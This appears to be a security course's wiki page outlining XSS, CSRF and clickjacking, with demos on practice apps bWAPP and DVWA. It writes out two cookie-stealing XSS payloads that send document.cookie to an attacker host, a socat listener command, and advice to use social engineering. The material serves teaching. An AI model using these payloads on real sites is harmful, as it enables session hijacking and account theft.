App Vulnerabilities: XSS, CSRF, and Clickjacking - Paiet/SEC-335 GitHub Wiki

  • Cross-site scripting (XSS)
    • Reflected
      • XSS exploits data that is reflected back to the user
      • Test bWAPP for XSS with Javascript ALERT*
      • Exploits
        • Browser Redirection & Cookie Stealing
          • Use Javascript to steal session cookies
            1. Craft URL with reflected XSS
  • <script>location.href'http://www.evilsite.com/bogus.php?cookie='+document.cookie;</script> 3. Use Social Engineering to trick user into clicking link 4. Check listener for connection 5. Use SOCAT 6. socat TCP-LISTEN:80,reuseaddr,fork -
    • Stored/persistent
      • Script gets stored on the DB or Web Server
        • Anywhere user input would persist as apart of the page
          • Comments are a great for this
            • Use SE to get user to browse site
              • Steal them cookies
    • <script>new Image().src="http://10.0.0.212/bogus.php?output="+document.cookie;</script>

App Vulnerabilities: XSS, CSRF, and Clickjacking Pt.2

  • DOM
    • The target's browser does all the script rendering
      • Isn't rendered by either the...
        • Database
        • Web Server
    • DEMO: DVWA
      1. Choose language setting and submit
      2. In Address bar add XSS alert after Language type
      3. Get alert pop up
      4. Inspect element of Language and see how XSS has become apart of the Language type (injected into the DOM)
  • HTML
    • Reflected
      • Vulnerable site takes user input
      • "Reflects" input back to user
    • Stored/Persistent
      • Injected code gets stored on vulnerable site's server
        • Typically as part of the web page
      • When users visit page with stored code
        • Code gets executed by user's browser
    • DEMO: DVWA and myHTTP-Login-Form-2.txt
  • Cross-site request forgery (CSRF/XSRF)
    • Exploits the trust relationship between a user and website
      • Unexpired session cookies makes this exploit possible
        • Social Engineering attack
          • Get user to click malicious web link
            • If user has current valid session, attack will complete
              • Difficult to pull off
  • Clickjacking
    • Hijacking a user's click events
      • Get likes/subscribes/notifications/
        • A way to artificially inflate site traffic and interest
          • DEMO: ClickJack.html and Mysite.html
⚠️ **GitHub.com Fallback** ⚠️